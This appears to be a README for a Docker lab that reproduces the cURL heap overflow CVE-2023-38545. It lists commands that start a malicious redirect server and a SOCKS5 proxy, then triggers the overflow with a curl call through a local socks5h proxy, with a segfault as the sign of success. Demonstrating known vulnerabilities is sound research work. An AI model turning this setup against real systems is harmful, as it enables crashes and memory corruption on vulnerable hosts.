This showcases the cURL CVE-2023-38545. It is as lightweight as I could make it.
First, build the Docker Image:
docker build . -t cveimage
Next, we can simply run the image file, creating a temporary Docker Container which will get deleted once the container is stopped:
docker run --rm --tty --net="host" --name cvecontainer cveimage
If you are struggling to type commands, simply open another terminal and run:
docker exec -it cvecontainer /bin/bash
Now, we need to start all the services. Connect to the already-running container, and run:
./exploit/malicious_redirect_server.sh &
python3 /exploit/proxy.py &
Now, from inside the container you can see the cURL exploit in action:
curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000
You must see a segmentation fault error on the machine that ran the curl command to know that the exploit succeeded. If you do not see it, either the exploit did not occur, or the process had so much heap space available that you did not overwrite into inaccessible memory.
- Make this README look pretty
- Configure systemd to automatically start the exploit code
- Reduce Docker Image build time and size
- Anything/everything else. . .?
- The socks5 proxy is not self-made. The original code for the proxy can be found here: https://github.com/alexbers/tgsocksproxy
-
- Originally exploited in ubuntu (wsl) with systemd support: https://github.com/aire1/mtproxy_autoinstaller
- The hackerone report, which saved tons of research time. Give this a read through if you want to understand how this exploit occurs: https://hackerone.com/reports/2187833